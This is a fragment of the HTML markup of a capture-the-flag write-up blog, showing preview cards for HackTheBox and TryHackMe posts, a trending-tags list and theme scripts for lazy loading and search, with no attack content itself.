class="card"> <a href="/posts/Quick/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago small" > Aug 27, 2020 <i class="unloaded">2020-08-27T22:21:00+07:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hackthebox - Quick</h3><div class="text-muted small"><p> Any actions and or activities related to the material contained within this Website is solely your responsibility. This site contains materials that can be potentially damaging or dangerous. If ...</p></div></div></a></div><div class="card"> <a href="/posts/OpenAdmin/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago small" > May 9, 2020 <i class="unloaded">2020-05-09T22:21:00+07:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hackthebox - OpenAdmin</h3><div class="text-muted small"><p> Any actions and or activities related to the material contained within this Website is solely your responsibility. This site contains materials that can be potentially damaging or dangerous. If ...</p></div></div></a></div><div class="card"> <a href="/posts/Overpass/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago small" > Aug 24, 2020 <i class="unloaded">2020-08-24T07:21:00+07:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Tryhackme - Overpass</h3><div class="text-muted small"><p> Any actions and or activities related to the material contained within this Website is solely your responsibility. This site contains materials that can be potentially damaging or dangerous. If ...</p></div></div></a></div></div></div></div></div></div><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script> <script type="text/javascript"> const imgs = document.querySelectorAll('#post-wrapper img'); const observer = lozad(imgs); observer.observe(); </script> <!-- The Footer v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"> <script src="https://www.hackthebox.eu/badge/122977"></script></div></div></footer></div><!-- The Search results v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-xl-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/tags/ssh/">Ssh</a> <a class="post-tag" href="/tags/cracking/">Cracking</a> <a class="post-tag" href="/tags/php/">Php</a> <a class="post-tag" href="/tags/john/">John</a> <a class="post-tag" href="/tags/secretsdump/">Secretsdump</a> <a class="post-tag" href="/tags/reverse-shell/">Reverse Shell</a> <a class="post-tag" href="/tags/python/">Python</a> <a class="post-tag" href="/tags/mysql/">Mysql</a> <a class="post-tag" href="/tags/lfi/">LFI</a> <a class="post-tag" href="/tags/kerbrute/">Kerbrute</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <!-- Jekyll Simple Search loader v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '//assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="http://localhost:4000{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"><div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div><div><i class="fa fa-tag fa-fw"></i>{tags}</div></div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>' }); </script>
